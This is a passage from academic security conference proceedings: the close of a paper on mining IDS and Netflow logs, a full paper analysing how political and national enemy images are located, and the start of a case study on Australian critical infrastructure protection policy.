The first pattern reflects the Nkiller2 DOS attack from 10.175.178.182 against the company web server,
while the second pattern indicates a horizontal SSH scan from 10.55.173.56. The third pattern
corresponds to an ICMP echo scan flood from 10.37.237.66 against the company web server. During the
experiments, we found that the algorithm is able to highlight many strong and unexpected attack patterns,
and also provide a concise overview of latest attack trends for the security administrator.
5. Conclusion
In this paper, we have presented a study of important properties of IDS and Netflow data sets. We have
also proposed several algorithms for IDS and Netflow log analysis.
For future work, we plan to employ statistical algorithms for measuring unexpected changes in supports
of commonly occurring frequent alert and network traffic patterns. We also intend to elaborate the service
detection algorithm and augment it with event correlation methods. In particular, we are considering the
creation of Simple Event Correlator (Vaarandi 2006) rules for suppressing repeated service messages
and for verifying with specifically crafted test packets if destination addresses are responding connection
attempts. Finally, our research agenda includes work on workstation traffic anomaly detection, employing
some of the methods described in this paper.
References
Al-Mamory, S.O., Zhang, H. and Abbas, A.R. (2008) “IDS Alarms Reduction Using Data Mining”, Proceedings of
2008 IEEE World Congress on Computational Intelligence, pp. 3564-3570.
266

Risto Vaarandi
Al-Mamory, S.O and Zhang, H. (2009) “Intrusion Detection Alarms Reduction Using Root Cause Analysis and
Clustering”, Computer Communications, vol. 32(2), pp. 419-430.
Clifton, C. and Gengo G. (2000) “Developing Custom Intrusion Detection Filters Using Data Mining”, Proceedings of
2000 MILCOM Symposium, pp. 440-443.
Julisch, K. (2001) “Mining Alarm Clusters to Improve Alarm Handling Efficiency”, Proceedings of 2001 Annual
Computer Security Applications Conference, pp. 12-21.
Julisch, K. (2003) “Clustering Intrusion Detection Alarms to Support Root Cause Analysis”, ACM Transactions on
Information and System Security, vol. 6(4), pp. 443-471.
Julisch, K. and Dacier, M. (2002) “Mining intrusion detection alarms for actionable knowledge”, Proceedings of 2002
ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 366-375.
Li, X. and Deng, Z.-H. (2010) “Mining Frequent Patterns from Network Flows for Monitoring Network”, Expert
Systems with Applications, vol. 37(10), pp. 8850-8860.
Long, J., Schwartz, D. and Stoecklin, S. (2006) “Distinguishing False from True Alerts in Snort by Data Mining
Patterns of Alerts”, Proceedings of 2006 SPIE Defense and Security Symposium, pp. 62410B-1--62410B-10.
McHugh, J. and Gates, C. (2003) “Locality: A New Paradigm for Thinking About Normal Behavior and Outsider
Threat”, Proceedings of 2003 New Security Paradigms Workshop, pp. 3-10.
Morin, B. and Debar, H. (2003) “Correlation of Intrusion Symptoms: an Application of Chronicles”, Proceedings of
2003 RAID Symposium, pp. 94-112.
Ning, P., Cui, Y. and Reeves, D. S. (2002) “Analyzing Intensive Intrusion Alerts via Correlation”, Proceedings of 2002
RAID Symposium, pp. 74-94.
Paredes-Oliva, I., Dimitritopoulos, X., Molina, M., Barlet-Ros, P. and Brauckhoff, D. (2010) “Automating Root-Cause
Analysis of Network Anomalies using Frequent Itemset Mining”, Proceedings of 2010 SIGCOMM Conference,
pp. 467-468.
Pietraszek, T. (2004) “Using Adaptive Alert Classification to Reduce False Positives in Intrusion Detection”,
Proceedings of 2004 RAID Symposium, pp. 102-124.
Taylor, T., Paterson, D., Glanfield, J., Gates, C., Brooks, S. and McHugh, J. (2009) “FloVis: Flow Visualization
System”, Proceedings of 2009 Cybersecurity Applications and Technology Conference for Homeland Security,
pp. 186-198.
Treinen, J.J. and Thurimella, R. (2006) “A Framework for the Application of Association Rule Mining in Large
Intrusion Detection Infrastructures”, Proceedings of 2006 RAID Symposium, pp. 1-18.
Vaarandi, R. (2004) “A Breadth-First Algorithm for Mining Frequent Patterns from Event Logs”, Proceedings of 2004
IFIP International Conference on Intelligence in Communication Systems, pp. 293-308.
Vaarandi, R. (2006) “Simple Event Correlator for real-time security log monitoring”, Hakin9 Magazine, vol. 1/2006 (6),
pp. 28-39.
Vaarandi, R. (2008) “Mining Event Logs with SLCT and LogHound”, Proceedings of 2008 IEEE/IFIP Network
Operations and Management Symposium, pp. 1071-1074.
Vaarandi, R. and Podiņš, K. (2010) “Network IDS Alert Classification with Frequent Itemset Mining and Data
Clustering”, Proceedings of 2010 IEEE Conference on Network and Service Management, pp. 451-456.
Viinikka, J. and Debar, H. (2004) “Monitoring IDS Background Noise Using EWMA Control Charts and Alert
Information”, Proceedings of 2004 RAID Symposium, pp. 166-187.
Viinikka, J., Debar, H, Mé, L., Lehikoinen, A., and Tarvainen, M. (2009) “Processing intrusion detection alert
aggregates with time series modeling”, Information Fusion Journal, vol. 10(4), pp. 312-324.
Viinikka, J., Debar, H., Mé, L., and Séguier, R. (2006) “Time Series Modeling for IDS Alert Management”,
Proceedings of 2006 ACM Symposium on Information, Computer and Communications Security, pp. 102-113.
Wagner, A. (2008) Entropy-Based Worm Detection for Fast IP Networks, PhD Thesis, Swiss Federal Institute of
Technology.
Wagner, C., Wagener, G., State, R., Engel, T. and Dulaunoy, A. (2010) “Game Theory driven monitoring of spatialaggregated
IP-Flow records”, Proceedings of 2010 IEEE Conference on Network and Service Management, pp.
463-468.
267

Locating the Enemy
Marja Vuorinen
University of Helsinki, Finland
marja.vuorinen@helsinki.fi
Abstract: Enmity is structured discursively in several ways, focussing on different characteristics and producing
various sets of concepts. Some of them relate to concrete geographical locations, while others refer to more abstract
sociological and political notions. Some sets of concepts are completely separate from one another, while others are
strongly interrelated and even form interesting combinations. An Enemy differs from an Other basically by being
experienced as openly and actually threatening. When creating an Other the unwanted features unsuitable for the
Good Self are moulded into a separate form, that is usually considered relatively stable, distant (not imminently
threatening) and safe. An Enemy has a similar core, but it is considered actively menacing. Most often it is also
imagined (or perceived) as approaching: drawing nearer and eventually closing in. To discover an enemy one thus
has to define a) where it is supposed to be situated and whether or not it is moving closer, b) how close by it currently
is, and c) whether it operates openly or under cover. This paper explores the location-related concepts that are used
to define enmity in all their variety. It experiments with the idea of integrating them all into a single system, producing
a mental map of all the possible locations of potential enemy types. These include first the enemies from outside: the
traditional military enemies situated outside the borders of a sovereign state, easiest defined apart from one another
by compass point. The second species of enemies are the so-called intimate enemies – a concept coined by Vilho
Harle (2000) – residing within the same society but outside the defining group, and divided into sub-species such as
the sociological enemies threatening ‘from above’ and ‘from below’, the enemies of a movement standing
symbolically either behind or ahead of it, and the traditional political enemies from right to left. These sets of subtypes
interrelate in many both obvious and unexpected ways. The third and most perilous enemy species is the internal
enemy, lurking inside the defining group itself, weakening it, sponging on it, or threatening with sabotage, betrayal or
desertion. Examples of each enemy type are discussed in the paper – the geographical ones, due to the author’s
nationality, mainly from a Northern European perspective, but with excursions to a more general European and
Western experience.
Keywords: enemy images, location, politics, sociology, geography
1. Introduction
This paper came into being as an extended semantic joke: as an attempt at organising the figures of
speech pointing out the locations of particular enemies, into a single system. By examining historical and
present-day enemies and comparing their actual and symbolical locations, it aims to form a preliminary
gallery of enemy types, through which other cases of enmity can be further analysed. Rhetorical samples
and historical cases serve as examples and illustrations. They are taken from previous research by
historians and social scientists, or formed through an ongoing observation of contemporary media.
Some of the enmities discussed below have their origin in the concrete circumstances of the physical
world, but have later been loaded with cultural connotations and consequently became institutionalised
into traditional conceptions. Some are metaphorical, abstracted from coincidental occurrence, while
others are by origin symbolic, i.e. agreement-based. How a certain enemy type is located when it is first
encountered, greatly influences the way how it is experienced and how it develops, as it gains attributes
from the previous enemies associated with the same location.
The defining in-group typically places itself into the centre of things. Different enemies are situated into
concentric zones around the defining centre. The outer circle is inhabited by the
geographic/political/military enemies of the state or nation, the enemies from outside. It can be further
divided into neighbouring states and others that are situated beyond the immediate neighbours or even
further away. In the next circle inwards are the intimate enemies: those who live within the same society
but outside the defining Self, e.g. ‘the nation’, a particular class or other ideologically conscious in-group.
This type of enemy is easily discerned and therefore relatively easy to deal with (Harle 2000: 35). The
most sinister case is the enemy within: an invisible threat hiding inside the in- group community, so far
unidentified and therefore very dangerous as a potential source of unsuspected aggression right in the
midst of Us.
The self-explanatory notion of placing the defining Self into the centre of things is susceptible to slight
alterations vis-à-vis the location of its definitional opposite. The defining in-group is not actually quite as
neutral a zero point as it likes to suggest: it is constantly re-moulded by the ideological opposites it
268

Marja Vuorinen
creates for itself. In the end image and counter-image create one another. They become understandable
only in their mutual relation (Harle 2000: 15–18).
An extreme way of marking intimate enemies apart is to compel them to wear a badge, e.g. a yellow Star
of David. A military enemy is recognized by alien uniform, equipment and/or ethnic features; its war
machinery is identifiable by model and insignia. This paper does not discuss such crude signals. Instead,
it discusses the inner characteristics given to imagined enemies, particularly vis-à-vis their symbolic or
actual location. Geographical enemies are examined, due to the author’s nationality, mainly from a
Northern European perspective, but with excursions to a more general European and Western
experience.
Enemy categories are discussed below as seen from outside, as instruments of negative identification: as
Others, who at a certain point of time have become somebody’s Enemies. What we are about to witness
are thus essentially distorted ways of thinking. Nothing is said about whether the perceived threats were
genuine or not. I will also refer to Us as the holders of the defining centre, representing a so-called ironic
we, an in-group identity that is imagined to be constant, but whose essence and position change as
enmities change.
2. How enemies are born and how they differ from others
Enmity and otherness, two identity-creating, identity-reversing concepts have a lot in common. Every
enemy is an Other, but all Others are not enemies. The study of enemy images benefits greatly from
studies concerning otherness. What is said about imagined Others is equally true about imagined
Enemies.
The ideas of otherness/enmity are based on the social psychological concept of projection coined by
Sigmund Freud. Projection begins with splitting what is considered evil, weak or faulty apart from the
acceptable psychological and cultural features. The second stage is to remove the unwanted features
from the self by placing them into an Other (usually someone who actually is slightly different) in order to
mentally protect the self. A famous illustration of this phenomenon is the 19 th century concept of the
Orient. Edward Said (1978) demonstrates that the historical Orient was created by colonial Europeans as
a counter-image of everything Western, holding the features the westerners did not wish or dare to
include into their cherished self-image. Thus the relation between Self and Other is often construed as a
series of dichotomies, e. g. freedom vs. oppression, progress vs. reaction, peace vs. violence, law vs.
lawlessness, culture vs. anarchy/decadence, purity vs. dirt, health vs. sickness, ending with life vs. death
(Vuorinen 2002: 266–272; Ehrnrooth 1992: 365–483).
Creating Others/Enemies is done by establishing stereotypes. According to Stuart Hall (1999) they are
based on convenient exaggeration of select features. A multiform reality is forced into few simple
patterns. The resulting banal categories influence how people belonging to a stereotyped group are
perceived. A vicious circle forms when negative presuppositions gain evidence through seemingly
spontaneous, neutral observation, making them seem natural and eternal.
Every community has members whose behaviour is less than perfect. This provides ground for negative
characterisation and makes the negative stereotypes appear partly true, making them vexingly longlasting.
On the other hand, most enemy images are so loose-fitting that different enemies can be
described with similar attributes. Correspondingly, most in-group identities appear strikingly similar, with
only minor circumstance-related variations. Goodness, truth, righteousness, purity, proper manners, right
religion and good morals are the hallmarks of the Self. What is natural and normal, genuine and
legitimate, are always ‘our’ qualities (Harle 2000: 13).
The main difference between Enemy and Other is their supposed activeness/passiveness. When
unwanted features (such as weakness, amorality, stupidity, destructivity, aggression, dirtiness, lack of
organization, and manners or ‘culture’.) are projected away from the Self into an imagined Other, this set
of bad features is captivated into a form that is both distant and stable, and located not only outside but
also below the Self. As a result the Other can be observed safely and is rarely perceived as actively
threatening (Said 1978). However, an Enemy cannot be trusted to keep its distance, but is suspected of
approaching, in order to kill, destroy, damage and/or steal. The image of an enemy is essentially an
image of a threat – of unwanted acts towards the Self and of their consequences – and of the subsequent
need to remain vigilant, to plan defence or even to attack first.
269

Marja Vuorinen
Needless to say, an Enemy is not only threatening but also Evil, and capable of evil deeds. This
fundamental badness it has inherited from its conceptual predecessor, the Other. Imagining an Enemy is
a precondition to any contest, as it suggests a possibility and a practical means of deliverance (Mosca
1939: 280).
Discourses of enmity are created, maintained, negotiated and modified by community. Enemy images
can of course appear spontaneously whenever there is a crisis involving separate groups. Nonetheless,
the most powerful, clear-cut images of enmity usually come into the world as conscious creations of
propaganda machinery, and are aggressively spread through available media. If they are accepted by the
community, they may become a permanent feature of popular thought, renewing itself within the culture.
Particularly acceptable are images that reinforce and unite the community by relieving pressure, e.g.
blaming some obvious social evil on an outside force (Klinge 1972: 57–131; Alapuro1973; Vuorinen
2010a, 2010b).
When an enemy is imagined/perceived as approaching, it quickly becomes necessary to establish its
relative location vis-à-vis the Self – that is: from what direction and distance it threatens, and how soon.
Unlike an Other, who is usually located below the Self, an Enemy can approach from any direction.
3. Enemies from outside: The geographical compass rose
Enemies that threaten a society from outside the state borders are easy to label non-human. They are
ethnical and cultural strangers, fairly unknown, with little or no reliable first hand information available. If
there is an ongoing military conflict, or imminent threat of one, i.e. if the danger caused by the enemy is
immediate and concrete, it is in the defending group’s best interest to strengthen its will to fight by
defining the enemy as non-human (Seppälä 2002: 55).
The archetypal eastern enemy of the Finnish popular imagery is the Russian/Soviet arch-enemy ryssä
(‘Ruskie’). In an inter-war period poem by Uuno Kailas, Rajalla (“On the frontier”, 1931; Kailas 1977: 239–
241), the enemy resembles a hostile force of nature. As a prose translation the poem goes like this:
The border appears as a crack in the ice. In front of me spreads Asia, the East. Behind me
lie Europe and the West. I protect them as a guard. […] Dreary and cold is the winter’s night,
freezing the breath of the east. It reminds us of slavery and forced labour. The stars above
look upon the horror. Far away over the steppes raises the spectre of Ivan the Cruel, an
omen of destruction, heralding a bloody sunrise. […] Never shall the iron-shod feet of the
enemy step on the sacred soil where our heroes rest. Not while I protect my country! Never
shall a stranger wrest away our precious legacy! There is plenty of room here for those dogs
of the steppes: they’ll get buried in our soil! As a strong bear I will attack them, throw myself
at their spears, to protect the spinning-wheels of our women and the cradles of our children!”
The text reads as a collection of dehumanizing features. The enemy is described as an unclean animal –
a dog, which in its negative aspect signifies enslavement and servility in obeying a master. It is
contrasted with the image of the Self as a powerful, independent bear figure, which, incidentally, is the
emblematic animal of Finland, and with the image of pure white stars. Other typical features are the deindividualising
mass-scale presence and ensuing numerical superiority, which of course spells qualitative
inferiority. Furthermore, the eastern enemy is pictured cruel and merciless (“iron-shod feet”), morally and
culturally below Us. Its animal nature and physical inferiority is associated to aimless loitering and sexual
promiscuity, resulting in uncontrolled birth rate and ever-expanding population, lack of discipline and
greediness. ‘Ruskies’ as Asians represent a sphere of non-humanity and non-culture (Karemaa 1998;
Vuorinen 2005b: 256–259). The image of the eastern hordes spilling over poor defenceless Europe
originated in the 18 th and 19 th centuries in Sweden and central Europe, and has been repeated within
nationalist discourses many times since (Harle 2000: 68–71). From the German/Nazi point of view
Russia appeared as an uncultured, under-developed territory, whose decline was due to the Slavic
Russians’ inability to govern a state by themselves (Vuorinen 2010b).
An ancient northern enemy type are the half-legendary Vikings: tall, strong, heavily armed Norsemen,
who raided the coastal villages of Europe, robbing and burning and taking slaves, leaving behind pillage
and ruin (Zilliacus 1989: 183–192). A later representative of the Northern/Nordic enemy is the blond and
muscular Aryan German idealised by Nazi ideologues (Paavolainen 1975: 54, 206–212, 233–247). From
the point of view of the Slavic peoples this was a western enemy, and fits also to that image.
270

Marja Vuorinen
It is interesting to note, that Vikings and Germans (Schivelbusch 2004: 32–33) are pictured similarly
regardless of whether they are perceived as heroes or as enemies. When accounting his stay, as a
visiting author, in the Third Reich, Olavi Paavolainen registers several such double images in his
enthusiastic but also ironic book Kolmannen Valtakunnan vieraana (As a guest of the Third Reich, 1936):
”The one hundred percent masculine, iron hard man-youth of the New Germany […] radiates […] an
unusual spiritual discipline and a hard, honest manliness”. The Aryan ideal “invoked an image […] of a
powerful, beautiful and healthy generation, free of any depressing notions of quilt and sin. The Third
Reich wishes to breed Nordic Hellenes, perfect of race and body, to be the noblest of Europeans”
(Paavolainen 1975: 32, 187).
A favourite southern enemy of the present-day Europe, Islam, closely resembles its eastern counterpart
in its rapidly expanding population and consequent expansion – in the early 21 st -century imagery the big
Muslim families would all but drown Europe – and as a category belonging to the zone of non-civilisation.
Their religion is essentially non-European. Their unbridled political and other passions are described as
those of an uncultured beast rather than a human being, let alone an adult human. The burqa-clad
woman of the Islam is seen as legally incompetent, by status resembling a minor – a victim of her
religion, who has been denied societal and moral adulthood. An Arab man is stereotyped either as a
woman-beater whose psychological development was arrested at puberty, as a religious leader spouting
forth empty threats, or as a politically immature al-Qaida terrorist (Kuusisto 2002). The absoluteness of
this image, and the inherent self-understanding, were crystallised by Tony Blair in a post-9/11 speech:
This mass terrorism is the new evil in our world today. It is perpetrated by fanatics who are
utterly indifferent to the sanctity of human life and we, the democracies of this world, are
going to have to come together to fight it together and eradicate this evil completely from our
world. […] This is not a battle between the United States and terrorism, but between the free
and democratic world and terrorism (Blair 2001).
The western enemy differs significantly from the others, and is therefore discussed as the last. It is also
much more modern that the previous three. From the point of view of the definer/observer it is situated
not below but above the Self. Accordingly, it represents a super-culture. It has material superiority, large
amounts of natural resources and/or a monopoly to exploit them, lots of money, high technology and
superior, e.g. nuclear weapons.
During the WW II the archetypal western enemy, at least from the perspective of Central and Eastern
Europe, was the Nazi Germany, with its for a time seemingly insurmountable resources, technological
and armament superiority, accentuated by a certain image of physical superiority resulting from a period
of relative prosperity and put forth by means of innovative showmanship (e. g. Kershaw 2000, passim). In
the post-war world the so-called Ugly American (originally the title of a political novel by Eugene Burdick
and William Lederer, published in 1958 and representing the arrogant behaviour of Americans abroad)
came to stand for a person whose actions are motivated by selfish economic calculations, who disdains
all other cultures and practices than his own, and whose final aim is to put his own nation into a position
of world domination.
From a non-European perspective the colonial overlords (Said 1978: 1–28 and passim) and the presentday
USA as the self-styled champion of democracy trying to induce disobedient nations to accept ‘our’
values by force (Wuori 2002: 162–163) also represent the western enemy.
4. Enemies within the shared society: Sociological and politological cases
The enemies whom Harle (2000:35) describes as intimate enemies are those who are considered aliens
or outsiders by the defining/observing in-group Self, but nevertheless live and act within the same
society. In the broad sense of the word they can be defined as political enemies. According to Carl
Schmitt, a political movement comes into being by identifying (establishing) an enemy, an outside group
that is seen to threaten its very existence. Excluding a chosen Other is thus the founding act of any
political community. It enables the in-group to recognise its own identity, which of course is defined as an
opposite of the enemy’s, in Schmitt’s vocabulary called a constitutive enemy (Schmitt 1996: 26–39, 46–
47, 54, 64–68, 74, 79).
Societal enemies from above and below date back for millennia, whereas the enemies from the right and
the left – though originating as terms from the times of the 1789 French revolution – belong to the modern
political maps of the19 th and 20 th centuries. The above/below divide is present also in the division of
271

Marja Vuorinen
society into lower, middle and upper classes; the latter division into three includes the central or middle
group, which in the former is only implied at.
An enemy from above is a living paradox. It is represented as superior and quasi-invincible, but also, very
pronouncedly, vincible: behind its seeming grandness looms qualitative inferiority. Its non-cultureness
manifests as decadence and/or as a hyper-culture, e. g. accentuation of formalities. An enemy from
above has, in the past, usurped the power, property and resources that rightfully belong to Us. Through
them it has built itself a superior position. It oppresses Us and is haughty, arrogant, proud, snobbish and
hierarchy-oriented. As a reactionary force it slows down the progress and maliciously disrupts the
development towards ‘our’ chosen future.
The classic case of an enemy from above is the 19 th -century nobleman, an icon of repressive mastership
and political reaction – as portrayed by its rival and soon-to-be successors, the bourgeois professionals
of the press. A conflict between the declining aristocracy and the upwardly mobile
Bildungsbürgertum/intelligentsia was presented to the public as a conflict between nobility and the people
(Vuorinen 2005a; Vuorinen 2010a; Taylor 2004). Another case in point is the made-to-order
conglomerate enemy tailored for the emergent Soviet Union, consisting of the imperial court, nobility,
clergy, bourgeoisie and kulaks (Harle 2000: 111–117).
Enemies from below stand literally lower than the spectator, and are by status non-cultural beings:
unlearned or mentally slow, resembling a child, a savage or an animal. They disrespect ‘our’ hierarchies
and norms, are listless, deceitful, defiant and demanding, and entertain big ideas about themselves. They
covet ‘our’ status, power, property and education and try to wrench them from us, do not succumb to our
guidance and dissociate themselves from our values. This category includes groups of low social origin
who criticize an elite group for bad morals or poor administration, e.g. popular religious revivals and
grass-root-level democratic movements (Huhta 2001; Vuorinen 2005b: 251–252; Bränn 2004).
The enemy from the right is related to an enemy from above. An enemy from above (right) tends to
embody not only abstract societal power, as in the case of nobility, but also the more concrete economic
power. The most recent historical case is the bourgeoisie of the 1960s-70s: the enemy of the leftist youth
movements of the era. It was created by late-19 th- century Marxists, whose agitators urged the
revolutionary workers to wrest power away from their masters, who deprived them of the fruits of their
labour, happiness, rest and education (Ehrnrooth 1992: 127–189).
The classical case of this enemy is the Whites of many early 20 th -century civil wars. The term ‘Whites’
was not used quite as widely as ‘Reds’ to denote a political tendency, yet the pair figured not only in
Russian but also Finnish, Estonian and German civil wars. Otto-Ville Kuusinen, a Finnish communist,
described the victorious Whites like this:
In addition to the massacres, the bourgeoisie killed the prisoners [Red prison-camp inmates]
also by letting them starve to death. For those god-fearing monarchists and joint-stock
company capitalists that was obviously the most orgiastic kind of revenge: the workers,
proud for their achievement as the generators of riches and thus their rightful owners, now
imprisoned and writhing in hunger, turning blue and breathing their last. Seeing this, the fine
lords of stock capital best can digest their fat, whet their appetite and revel in their
superhuman power (quoted in Paavolainen 1967: 296–297).
An enemy from the left relates to an enemy from below. The combination enemy from below (left) is fairly
common. All revolutionaries belong to this category. The Finnish 1918 Whites saw the Reds as tainted by
ideological filth; communism was called a red epidemic. Their cruelty was emphasized by animal
metaphors and graphic descriptions of rape and mutilation (Paavolainen 1966: 245–271; Vuorinen
2005b: 253–255). White newspapers revelled in stories, heavily spiced with reversed religious
symbolism, about how the Reds tortured country clergymen. One had been crucified on the altar. On the
wall behind him was written, in blood, “May your God help you”. Another’s body was propped up with
bayonets, eyes pierced, spectacles on and Bible in hand. A third had been first beaten senseless, then
forced to watch as the Reds raped his wife and four daughters, and after burned along with his rectory
(Paavolainen 1966: 251, 270).
Other combinations of political compass points are more problematic. Enemies from above (left) might be
the youngsters of well-to-do families who in the 1960s and ‘70s rebelled against the older generation
parading picturesque leftist rhetoric. A 19 th -century case in point is the progressive nationalist-democratic
272

Marja Vuorinen
movement, proclaiming for a time to be “of the people and for the people”, but soon landing into positions
well above the people – and seen, by their opponents, to be sentimental, overly ideological and
incompetent.
From below (right) come the mass movements of the extreme right: Nazis, fascists, Francoists. The
combination is embodied by the German Übermensch, whose physical superiority combines discipline
and subordination of the individual to the whole. A hallmark of this mentality is the uniform, hiding an
individual into a multiplicity, dramatising mass scale and unity (Paavolainen 1975: 254–270).
5. Internal enemies: shirkers and traitors
The most unpredictable and therefore the most suspicious enemies are those, who by their looks and
manners cannot be separated from Us, who hide among Us and whom we treat as one of Us – but who
may eventually betray us and thus, from the beginning, were not worth our trust.
The risks caused by internal enemies are at their direst during war-time, when the contribution of every
citizen is needed to defend the nation. War-time freeloaders and troublemakers – those who fail to do
their duty while others risk their lives – can be divided into further categories, including complainers,
shirkers, mutineers and deserters within the ranks of the army, defeatists who weaken the morale on the
home front and profiteers who unscrupulously exploit the war economy. The cross-border, fifth-column
forms of desertion include treason and collaboration with the enemy, while a domestic treason typically
manifests as revolt (Vuorinen 2010b). A special subtype of sexual treason is committed by ‘Our women’
who jeopardize the moral of the nation by consorting with the enemy; e.g. in France after the WW II many
‘brides of the Germans’ were publicly punished (Karemaa 1998:, 23–24, 66–67; Junila 2000; 146–165;
Virgili 2002).
Internal enemies come also in peacetime varieties. Those incapable to carry full responsibility, known as
weak links, put the survival of the group, e. g. nation at peril. Morally slack, mentally ill, disabled and
alcohol abusers were often condemned as public enemies by the social reformists of the late 19 th and
early 20 th century (Uimonen 1999; Mattila 2005). Peacetime freeloaders are those who choose not to
work; an industrious sub-species of this type is the speculator who benefits from the work of others. The
civilian shirkers come in two varieties: those who won’t pay taxes but exploit the social benefits and those
who by their choices increase the commonwealth’s health-care expenses: alcoholics, drug addicts,
tobacco smokers and obese exercise-avoidants. Far more perilous are the peacetime traitors, who
violate the bonds of law and loyalty: criminals and terrorists. During racist regimes, those who consorted
with home-grown “racial inferiors” could be condemned as traitors of their race (Vuorinen 2010b).
6. Temporal and eternal enemies: Religion and history
The theological division into heaven and hell will not be discussed here, even though it is considered by
some as the core of all rhetoric on good versus evil (Harle 2000: 25–39). Suffice it to note that religious
identities have, for millennia, provided an ultimate criterion of division between Us and Them.
In modern secular discourse the division into heaven/hell is sometimes replaced by a sequence of
past/present/future. By demonising the past the present circumstances can be represented as optimal,
normal and natural, whereas any diversion from them can be interpreted as harmful and unnatural.
Alternate ways to deal with this sequence are the optimistic model, that demonises not only the past but
also and most particularly the present, and places the better prospects into a utopian future, and the
pessimistic, reactionary notion of the past as a golden age, in turn demonizing the impending future.
References
Alapuro, R. (1973) Akateeminen Karjala-seura: ylioppilasliike ja kansa 1920- ja 1930-luvulla, WSOY, Porvoo.
Blair, T. (2001) “Blair calls for world fight against terror”, in Guardian, 12 September 2001
(http://www.guardian.co.uk/politics/2001/sep/12/uk.september11).
Bränn, M. (2004) ”Axel Olof Freudenthal och den Nyländska avdelningens värdeorientering.” Ahl & Bränn
(eds.)1904: Samlingar utgivna av Nylands Nation XIII, Nylands Nation, Helsingfors, pp. 20–49.
Ehrnrooth, J. (1992) Sanan vallassa, vihan voimalla: sosialistiset vallankumousopit ja niiden vaikutus Suomen
työväenliikkeessä 1905–1914, SHS, Helsinki.
Gummerus, K.J. (1970) Ylhäiset ja alhaiset, Gummerus, Jyväskylä.
Hall, S. (1999) Identiteetti, Vastapaino, Tampere.
Harle, V. (2000) The enemy with a thousand faces: the tradition of the other in western political thought and history,
Praeger, Westport (Conn.).
273

Marja Vuorinen
Huhta, I. (2001) ”Täällä on oikea suomenkansa”: körttiläisyyden julkisuuskuva 1880–1918, Suomen
kirkkohistoriallinen seura, Helsinki.
Immonen, K. (1987) Ryssästä saa puhua… Neuvostoliitto suomalaisessa julkisuudessa ja kirjat julkisuuden muotona
1918–39, Otava, Helsinki.
Junila, M. (2000) Kotirintaman aseveljeyttä: suomalaisen siviiliväestön ja saksalaisen sotaväen rinnakkainelo
Pohjois-Suomessa 1941–1944, SHS, Helsinki.
Kailas, U. (1977) Runoja, WSOY, Porvoo.
Karemaa, O. (1998) Vihollisia, vainoojia, syöpäläisiä: venäläisviha Suomessa 1917–1923, SHS, Helsinki.
Kershaw, I. (2000), Hitler, 1936–45: Nemesis. Penguin, London.
Klinge, M. (1972) ”Vihan veljistä” valtiososialismiin: yhteiskunnallisia ja kansallisia näkemyksiä 1910- ja 1920-luvuilta,
WSOY, Porvoo.
Kuusisto, R. (2002). ”Ei mitään hätää! Terrorismin vastaisen sotamme ’virhetulkinnat’ ja ’oikeat perustelut’.” First we
take Manhattan – terrorismi ja uusi maailmanjärjestys, Like, Helsinki, pp. 71–82.
Luostarinen, H. (1986) Perivihollinen: Suomen oikeistolehdistön Neuvostoliittoa koskeva viholliskuva sodassa 1941–
44: tausta ja sisältö, Vastapaino, Tampere.
Mattila, M. (2005) Sterilointipolitiikka ja romanit Suomessa vuosina 1950–1970. Häkkinen & al. (eds.), Vieraat kulkijat
– tutut talot: näkökulmia etnisyyden ja köyhyyden historiaan Suomessa, SKS, Helsinki.
Mosca, G. (1939). The ruling class: elementi di scienza politica (1896), McGraw-Hill, New York.
Paavolainen, J. (1966, 1967) Poliittiset väkivaltaisuudet Suomessa 1918 I–II, Tammi, Helsinki.
Paavolainen, O. (1975/1936) Kolmannen valtakunnan vieraana, Otava, Helsinki.
Said, E. (1978) Orientalism. Pantheon Books. New York:
Schivelbusch, W. (2004) The culture of defeat: on national trauma, mourning, and recovery, Granta, London.
Tarkiainen, K. (1986) Se vanha vainooja: käsitykset itäisestä naapurista Iivana Julmasta Pietari Suureen, SHS,
Helsinki.
Taylor, A. (2004) Lords of Misrule: Hostility to Aristocracy in Late Nineteenth- and Early Twentieth-Century Britain,
Palgrave Macmillan, Basingstoke.
Uimonen, Minna (1999). Hermostumisen aikakausi: Neuroosit 1800- ja 1900-lukujen vaihteen suomalaisessa
lääketieteessä, SHS, Helsinki.
Virgili, F. (2002). Shorn women: gender and punishment in liberation France, Berg, Oxford & New York.
Vuorinen, M. (2005a) “Inventing an Enemy: Bloodsucking Noblemen in Finnish Fiction.” H. Salmi (ed.), History in
Words and Images. Proceedings of the Conference on Historical Representation, Turku, pp. 109–121.
http://www.hum.utu.fi/historia/2000/
Vuorinen, M. (2005b). ”Herrat, hurrit ja ryssän kätyrit – suomalaisuuden vastakuvia.” Pakkasvirta & Saukkonen
(eds.), Nationalismit, WSOY, Helsinki, pp. 246–264.
Vuorinen, M. (2010a) Kuviteltu aatelismies: aateluus viholliskuvana ja itseymmärryksenä 1800-luvun Suomessa,
Helsinki, SKS.
Vuorinen, M. (2010b) ”Mein Kampf revisited: enemy images as inversions of the Self” in D. Remenyi (ed.)
Proceedings of the 9th European conference on information warfare and security. Academic Conferences
Limited, Reading.
Wuori, M. (2002) ”Maailma järjestyksen kourissa.” First we take Manhattan: terrorismi ja uusin maailmanjärjestys,
Like, Helsinki, pp. 152–172.
Zilliacus, V. (1989) Rakas vanha Eurooppa: kulttuurikuvia vuosisatojen varrelta, Tammi, Helsinki.
274

Australian National Critical Infrastructure Protection: A Case
Study
Matthew Warren and Shona Leitch
Deakin University, Australia
mwarren@deakin.edu.au
shona@deakin.edu.au
Abstract: Australia has developed sophisticated national security policies and physical security agencies to protect
against current and future security threats associated with critical infrastructure protection and cyber warfare
protection. This paper will discuss some of the common security risks that face Australia and how their government
policies and strategies have been developed and changed over time, for example, the proposed Australian
Homeland Security department. This paper will discuss the different steps that Australia has undertaken in relation to
developing national policies to deal with critical infrastructure protection.
Keywords: critical infrastructure, Australia and policy
1. Introduction
Australia is a modern society and is highly dependent on key critical systems at the national and state
level. These key systems have become more dominant as the Information Age has developed. These
key systems are grouped together and described as critical infrastructure; this is infrastructure so vital
that its incapacity or destruction would have a debilitating impact on defence and national security (Lewis,
2006). Many of these critical systems are based upon ICT (Information and Communication Technology)
systems.
Australia takes ICT security very seriously, it has been estimated that Australian organisations spend
between A$1.37 – A$1.74 billion per year on IT security, and the total financial losses due to computerrelated
security incidents in the 2006 financial year have been estimated to be between $595 and $649
million (Australian Institute of Criminology, 2009).
This paper will review the current strategies used by Australia over a decade and evaluate their
differences and discuss the reasons for these differences. Future threats such as Cyber Warfare and the
steps that are being proposed will be considered. This paper will highlight current Australian best
practices in critical infrastructure and cyber warfare protection many of which may be applicable in a
